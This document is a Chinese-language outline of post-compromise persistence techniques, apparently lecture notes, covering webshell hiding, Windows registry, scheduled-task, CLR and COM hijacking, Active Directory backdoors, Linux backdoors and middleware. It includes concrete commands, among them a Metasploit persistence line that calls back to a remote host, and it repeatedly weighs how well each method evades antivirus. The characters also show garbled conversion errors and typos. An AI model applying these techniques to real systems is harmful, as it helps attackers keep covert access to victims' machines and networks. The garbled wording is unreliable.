持久化的一些方法

以前講了次課準備的，ppt就不放了，當時的思路搬運過來

---

須要思考的幾個問題

1 返回路徑 (網絡出口,網絡之間)

2 部署方式及免殺 (我的電腦,服務器,殺軟)

3 痕跡清理

 

 

---

---

web相關

1 webshell

attrib +s +h test.php  隱藏test.php文件

attrib命令 用於修改文件屬性

+s 設置系統文件屬性

+h 設置隱藏屬性

.user.ini

auto_append_file = 1.gif

user_ini.cache_ttl = 10

 

auto_append_file    包含要執行的文件

user_ini.cache_ttl  從新讀取用戶 INI 文件的間隔時間

2 代碼修改

 

---

windows

1 程序替換

shift後門

替換不經常使用服務程序

對於開源軟件,從新編譯目標使用的程序,好比notepad++,mysql

程序內插入shellcode         shellter

2 rid hijack(帳戶克隆)

3 註冊表映像劫持

Gflags.exe

 

4 自啓動

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

msf persistence

run persistence -X -i 5 -p 4445 -r 1.1.1.1

 

缺點：容易被殺軟發現

優勢：種植容易

註冊表路徑: HKCU\Environment\

建立字符串鍵值: UserInitMprLogonScript

鍵值設置爲bat的絕對路徑:D:\工做\1.bat

 

由於Logon Scripts是優先於不少殺毒軟件啓動（部分殺毒是優先於他啓動）的，因此能夠經過這種方式將powershell命令寫到bat腳本中，達到免殺隱藏啓動的效果

 

優勢：免殺效果比較好

缺點：隱蔽性相對較弱，由於存在後門文件。

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

 

Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,xxxxx"

 

這種方法能夠實現無文件落地，直接執行powershell命令，而且他也是優於殺毒軟件進行啓動的

 

缺點：權限要求較高

優勢：無文件落地，隱蔽性，免殺性較好。

開始菜單啓動項

開始菜單啓動項

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

5 計劃任務

schtasks.exe /Create /TN update /TR xx(你要執行的命令) /SC ONLOGON /F /RL HIGHEST

不必定要啓動時

 

優勢：通常殺毒軟件不會攔截這條命令

缺點：後門存在於系統當中，而且須要作免殺。

 

6 CLR劫持

優勢：無需管理員權限，並可以劫持全部.Net程序。更重要的是,系統默認會調用.net程序,致使後門自動觸發

 

7 com對象劫持

劫持CAccPropServicesClass以及MMDeviceEnumerator

優勢：相對於CLR劫持.net,此方法無需重啓。

系統不少正常程序啓動時須要調用這兩個實例，因此，這就能夠用做後門來使用，而且，該方法也可以繞過Autoruns對啓動項的檢測。

 

 

MruPidlList

COM對象MruPidlList，做用於shell32.dll，shell32.dll用於打開網頁和文件，因此當系統啓動時一定會執行

 

8 waitfor

waitfor heheda & echo 1

waitfor /s 1.1.1.1 /si heheda

 

9 office劫持

Office在啓動過程當中，會自動加載C:\Users\xxx\AppData\Roaming\Microsoft\Word\Startup文件夾中的dll

 

10 junction folder

11 windows庫

12 程序插件和擴展

13 DLL劫持

14 wmi事件

 

---

 

windows域相關

1 golden ticket

2 skeleton key

3 dsrm

4 sid history

5 ACL後門

6 silver ticket

7 msdtc加載後門

8 dump hash

9 隱蔽的dcshadow

10 惡意SSP

11 Hook PasswordChangeNotify

---

 

linux

1 計劃任務

ehco "*/2 * * * * ./test」>filename.txt 

crontab filename.txt

 

除了最多見的crontab還有

at

anacron

2 ssh軟鏈接後門

3 ssh wrapper

4 rootkit

5 suid shell

6 利用alias

7 pam認證機制後門

8 PROMPT_COMMAND後門

9 寫入公鑰

10 suid shell

11 inetd.conf

---

 

中間件

1 php擴展後門

2 apache模塊後門

3 mysql

4 mssql

5 iis

6 tomcat